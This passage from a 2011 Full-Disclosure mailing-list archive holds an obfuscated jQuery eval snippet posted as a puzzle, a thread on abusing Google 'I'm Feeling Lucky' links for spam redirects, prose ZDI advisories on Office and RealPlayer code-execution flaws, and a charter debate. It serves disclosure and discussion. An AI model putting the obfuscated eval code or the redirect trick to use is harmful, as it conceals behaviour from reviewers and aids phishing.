Re: [Full-disclosure] guess what this does..

[Christian Sciberras]

Other than a parse error? Nothing.





On Tue, Apr 12, 2011 at 11:28 PM, Cal Leeming  wrote:

> $(function() {
> var
> _0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\",\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
> var
> _0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
> });
>
> enjoy ;p
>
> ps) yes I obfuscated this, and no it doesn't contain any nasties.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Raj Mathur (राज माथुर)]

On Tuesday 12 Apr 2011, Steven Pinkham wrote:
> [snip]
> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.

OSI doesn't approve projects, only licences.  I presume you mean "Only 
announcements for projects released under an OSI-approved licence." 


Regards,

-- Raj
-- 
Raj Mathurr...@kandalaya.org  http://kandalaya.org/
   GPG: 78D4 FC67 367F 40E2 0DD5  0FEF C968 D0EF CC68 D17F
PsyTrance & Chill: http://schizoid.in/   ||   It is the mind that moves

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] guess what this does..

[Cal Leeming]

$(function() {
var
_0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\",\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
var
_0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
});

enjoy ;p

ps) yes I obfuscated this, and no it doesn't contain any nasties.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Cal Leeming]

Actually, the filtering seems to be based on the accuracy of the first hit
set.

http://www.google.com/search?q=hacker&btnI - win
http://www.google.com/search?q=hello+hacker&btnI - fail
http://www.google.com/search?q=hello+hack&btnI - win
http://www.google.com/search?q=hello+hac&btnI - fail
http://www.google.com/search?q=hello&btnI - win

See what I mean?

On Tue, Apr 12, 2011 at 2:38 PM, satyam pujari  wrote:

> @Cal Try this...
>
> http://www.google.com/search?q=esploit&btnI
>
> http://www.google.com/search?q=esploit+zeus&btnI
>
> http://www.google.com/search?q=0x+t35&btnI&safe=active
>
> some of them didn't work aswell..
>
> http://www.google.com/search?q=0x+t35&btnI
>
> http://www.google.com/search?q=hello+hacker&btnI
>
> but funny "hello human" works..
>
> http://www.google.com/search?q=hello+human&btnI
>
> I bet there's some keyword filter/check at Google's side (but I
> believe which can be bypassed)
> So, it's all about playing with the keywords.
>
>
> On Tue, Apr 12, 2011 at 2:39 PM, Cal Leeming  wrote:
> >
> > Didn't seem to wrok for me:
> >
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage
> >   +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b
> >
> > On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser 
> wrote:
> >>
> >> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a practical
> use for it?
> >>
> >> 
> >> Leon Kaiser  - Head of GNAA Public Relations -
> >> litera...@gnaa.eu || litera...@goatse.fr
> >>http://gnaa.eu || http://security.goatse.fr
> >>   7BEECD8D FCBED526 F7960173 459111CE F01F9923
> >> "The mask of anonymity is not intensely constructive."
> >>-- Andrew "weev" Auernheimer
> >> 
> >>
> >> On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
> >>
> >> Thanks for that Nick , good to know , but unfortunately it's still
> exploitable in 2011 :)
> >>
> >> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald <
> n...@virus-l.demon.co.uk> wrote:
> >>
> >> satyam pujari wrote:
> >>
> >> > Here is a simple Google's "I'm Feeling Lucky" search feature
> exploitation
> >> > scenario.
> >>
> >> > [...]
> >>
> >> Yawn...
> >>
> >> That's _so_ 2007!
> >>
> >>   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
> >>
> >> ...and I seriously doubt that was the first time it was done, just when
> >> _I_ happened to make a note of it being actively abused in spam.
> >>
> >> All that other stuff about free hosting sites and IFrames on
> >> blogger.com is unnecessary implementation detail that can be achieved
> >> multitudinous ways.
> >>
> >>
> >>
> >> Regards,
> >>
> >> Nick FitzGerald
> >>
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Nick FitzGerald]

Cal Leeming wrote:

> Didn't seem to wrok for me:
> 
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage
>   +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b

It certainly did when I first reported that URL back in Sep 2007.

A far from exhaustive bit of testing just now shows that it appears 
that Google is doing a Referer check on just those search terms (not 
just on the order), as you can do an "I'm feeling Lucky" search _from 
Google_ for those terms and get auto-redirected to the top search 
result, but if you just hit one of those search URLs with the IFL flag, 
you get the search results rather than an auto-redirect.

Did you think to try some less well-publicized URL abusing this 
functionality?

I wonder which other (if any) IFL abuse URLs that have been used in 
spam, scams and such Google blocks?



Regards,

Nick FitzGerald


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Pete Smith]

I agree, un-moderated doesn't mean that people can't be banned for breaking
the rules or being a troll...

Pete

On 13 April 2011 06:35, Michal Zalewski  wrote:

> > It's whatever, un-moderated means exactly that. No-one can tell anyone
> else what to release/write. Period.
>
> Of course you can. That's what the charter is for. Unmoderated means
> simply that the charter is usually not proactively enforced (but even
> that is hardly an absolute guarantee).
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-125: Microsoft Office PowerPoint PersistDirectoryEntry Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-125: Microsoft Office PowerPoint PersistDirectoryEntry Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-125

April 12, 2011

-- CVE ID:
CVE-2011-0656

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10885. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within how the application handles an exception
within the PersistDirectoryEntry records when loading a presentation.
When an entry points to a container containing a Slide with a malformed
record, the application will raise an exception during the loading of
the record. Afterward the application will use a method off of this
malformed object which can lead to code execution under the context of
the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx

-- Disclosure Timeline:
2010-09-14 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-124: Microsoft PowerPoint TimeColorBehaviorContainer Floating Point Record Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-124: Microsoft PowerPoint TimeColorBehaviorContainer Floating Point 
Record Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-124

April 12, 2011

-- CVE ID:
CVE-2011-0655

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10873. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within how the application parses a record
associated with animation. If a container holds a specific record type,
the application will explicitly trust a length used in this record to
calculate a pointer for copying floating point numbers to. This can be
used to write outside of an allocated buffer and will lead to code
execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx
-- Disclosure Timeline:
2010-09-14 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-123: Microsoft PowerPoint TimeCommandBehaviorContainer Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-123: Microsoft PowerPoint TimeCommandBehaviorContainer Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-123

April 12, 2011

-- CVE ID:
CVE-2011-0655

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10822. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within the ppcore.dll module responsible for
parsing PowerPoint (ppt) files. When parsing a malformed
TimeCommandBehaviorContainer structure the process raises an exception
that causes an object in memory to be freed prior to being fully parsed.
Due to the lack of a check that this object has been freed, a later
function references an invalid pointer element. This can be leveraged by
a remote attacker to execute arbitrary code under the context of the
user running PowerPoint.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx

-- Disclosure Timeline:
2010-09-24 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-122: RealNetworks RealPlayer OpenURLInDefaultBrowser Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-122: RealNetworks RealPlayer OpenURLInDefaultBrowser Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-122

April 12, 2011

-- CVE ID:
CVE-2011-1426

-- CVSS:
9.7, (AV:N/AC:L/Au:N/C:C/I:P/A:C)

-- Affected Vendors:
RealNetworks

-- Affected Products:
RealNetworks RealPlayer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11062. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of RealNetworks RealPlayer. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within RealPlayer exposes a method called
OpenURLInDefaultBrowser() that can be accessed through RealPlayer's
internal browser. When this method is called, it will open and execute
the first parameter based on the operating system's default handler for
the filetype. An attacker can reach RealPlayer's internal browser by
utilizing a specially crafted .rnx file. This can be leveraged to
execute arbitrary code under the context of the user invoking
RealPlayer.

-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:

http://service.real.com/realplayer/security/04122011_player/en/

-- Disclosure Timeline:
2011-02-17 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Peter Vreugdenhil ( http://vreugdenhilresearch.nl )
* Andrea Micalizzi aka rgod

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Michal Zalewski]

> It's whatever, un-moderated means exactly that. No-one can tell anyone else 
> what to release/write. Period.

Of course you can. That's what the charter is for. Unmoderated means
simply that the charter is usually not proactively enforced (but even
that is hardly an absolute guarantee).

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Ryan Sears]

Yeah, I second that. 

Where do you draw the line if you do start making up rules like that? What 
about a vulnerability like path-disclosure or insufficient anti-automation? 
Granted they're not huge bugs, but they ARE bugs. 

There's crap I don't want to read on this list, but that's a decision I have to 
make. Granted the INSECT Pro minor releases are a bit annoying, but no more 
then cal sending porn to the list. 

It's whatever, un-moderated means exactly that. No-one can tell anyone else 
what to release/write. Period. 

Ryan

- Original Message -
From: "rancor" 
To: "Steve Pinkham" 
Cc: full-disclosure@lists.grok.org.uk
Sent: Tuesday, April 12, 2011 3:50:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Announcement posts and the charter (was Re: 
INSECT Pro 2.5.1 released)

What to do about it? It's not moderated?

Just ignore stuff and use the often used key called delete. Simple as that
=)

// rancor
Den 12 apr 2011 21.16 skrev "Steve Pinkham" :
> On 04/12/2011 09:04 AM, phil wrote:
>> Just keep that simple, the post hit the non acceptable content.
>>
>> "Gratuitous advertisement, product placement, or self-promotion is
>> forbidden."
>>
>>
>>
>> My opinion, but if the product could be free, like it was, then I don't
>> mind seeing those kind of post, but for anything commercial FD is not
>> there for that.
>>
>
> I agree, but think that intuition should be inscribed in more precise
> language.
>
> That whole sentence starts out with "Gratuitous", which to me seems to
> be unclear to both native and non-native speakers alike. IMHO It's just
> too easy to justify to yourself that what you are doing is does not
> violate wording of the charter, and therefore I think the charter should
> be more explicit.
>
> When would it be OK(non-gratuitous) to mention a tool? When it comes
> with a new vulnerability class? When it was used to find a particular
> flaw? When it shows a novel way of finding flaws of a particular class?
> When the tool is Open Source, such that the tool is an embodiment of
> knowledge being shared?
>
> This whole issue with INSECT Pro show a lack of consensus on what
> advertisement means, and what kicked it off was a disagreement about
> what the definition of a "free" product is.
>
> I'm coming around to the idea that the rules should be based on
> knowledge transfer. My intuition is that only projects with OSI
> approves licenses should be allowed(as Tim argued), unless you are
> releasing a tool of any sort along with a new class of vulnerability.
> Also, announcements of more then 1 per six months should be forbidden
> for any project. This would serve as a sort of default deny rule to
> keep the most annoying types of announcements at bay.
>
> Any other thoughts?
>
> The other posibility is the current wording sufficient as a simple
> "Don't be a dick" kind of rule, and more specific rules would be lost on
> those who have no problem with being a dick. I would argue that more
> guidance in the charter on this issue might be worthwile for the
> majority of people who do not in fact want to break Wheaton's law.
>
>
>>
>> -phil
>>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[rancor]

What to do about it? It's not moderated?

Just ignore stuff and use the often used key called delete. Simple as that
=)

// rancor
Den 12 apr 2011 21.16 skrev "Steve Pinkham" :
> On 04/12/2011 09:04 AM, phil wrote:
>> Just keep that simple, the post hit the non acceptable content.
>>
>> "Gratuitous advertisement, product placement, or self-promotion is
>> forbidden."
>>
>>
>>
>> My opinion, but if the product could be free, like it was, then I don't
>> mind seeing those kind of post, but for anything commercial FD is not
>> there for that.
>>
>
> I agree, but think that intuition should be inscribed in more precise
> language.
>
> That whole sentence starts out with "Gratuitous", which to me seems to
> be unclear to both native and non-native speakers alike. IMHO It's just
> too easy to justify to yourself that what you are doing is does not
> violate wording of the charter, and therefore I think the charter should
> be more explicit.
>
> When would it be OK(non-gratuitous) to mention a tool? When it comes
> with a new vulnerability class? When it was used to find a particular
> flaw? When it shows a novel way of finding flaws of a particular class?
> When the tool is Open Source, such that the tool is an embodiment of
> knowledge being shared?
>
> This whole issue with INSECT Pro show a lack of consensus on what
> advertisement means, and what kicked it off was a disagreement about
> what the definition of a "free" product is.
>
> I'm coming around to the idea that the rules should be based on
> knowledge transfer. My intuition is that only projects with OSI
> approves licenses should be allowed(as Tim argued), unless you are
> releasing a tool of any sort along with a new class of vulnerability.
> Also, announcements of more then 1 per six months should be forbidden
> for any project. This would serve as a sort of default deny rule to
> keep the most annoying types of announcements at bay.
>
> Any other thoughts?
>
> The other posibility is the current wording sufficient as a simple
> "Don't be a dick" kind of rule, and more specific rules would be lost on
> those who have no problem with being a dick. I would argue that more
> guidance in the charter on this issue might be worthwile for the
> majority of people who do not in fact want to break Wheaton's law.
>
>
>>
>> -phil
>>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Steve Pinkham]

On 04/12/2011 09:04 AM, phil wrote:
> Just keep that simple, the post hit the non acceptable content.
> 
> "Gratuitous advertisement, product placement, or self-promotion is
> forbidden."
> 
> 
> 
> My opinion, but if the product could be free, like it was, then I don't
> mind seeing those kind of post, but for anything commercial FD is not
> there for that.
> 

I agree, but think that intuition should be inscribed in more precise
language.

That whole sentence starts out with "Gratuitous", which to me seems to
be unclear to both native and non-native speakers alike. IMHO It's just
too easy to justify to yourself that what you are doing is does not
violate wording of the charter, and therefore I think the charter should
be more explicit.

When would it be OK(non-gratuitous) to mention a tool? When it comes
with a new vulnerability class? When it was used to find a particular
flaw?  When it shows a novel way of finding flaws of a particular class?
 When the tool is Open Source, such that the tool is an embodiment of
knowledge being shared?

This whole issue with INSECT Pro show a lack of consensus on what
advertisement means, and what kicked it off was a disagreement about
what the definition of a "free" product is.

I'm coming around to the idea that the rules should be based on
knowledge transfer.  My intuition is that only projects with OSI
approves licenses should be allowed(as Tim argued), unless you are
releasing a tool of any sort along with a new class of vulnerability.
Also, announcements of more then 1 per six months should be forbidden
for any project.  This would serve as a sort of default deny rule to
keep the most annoying types of announcements at bay.

Any other thoughts?

The other posibility is the current wording sufficient as a simple
"Don't be a dick" kind of rule, and more specific rules would be lost on
those who have no problem with being a dick. I would argue that more
guidance in the charter on this issue might be worthwile for the
majority of people who do not in fact want to break Wheaton's law.


> 
> -phil
> 
-- 
 | Steven Pinkham, Security Consultant|
 | http://www.mavensecurity.com   |
 | GPG public key ID CD31CAFB |



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-121

April 12, 2011

-- CVE ID:
CVE-2011-0105

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Excel

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11033. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Excel. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the application's parsing of a
particular record within a Microsoft Excel Compound Document. When
specifying a particular value, the application will fail to initialize a
variable that is used as the length of a memcpy operation. Due to the
usage of the uninitialized value, with proper control of the program
flow an attacker can force a length of their own choosing for the memcpy
operation. This will cause a buffer overflow and can lead to code
execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx

-- Disclosure Timeline:
2010-10-18 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aniway (Aniway.Anyway AT gmail DOT com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-120

April 12, 2011

-- CVE ID:
CVE-2011-0101

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Excel 2002

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10872. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Excel. User interaction is
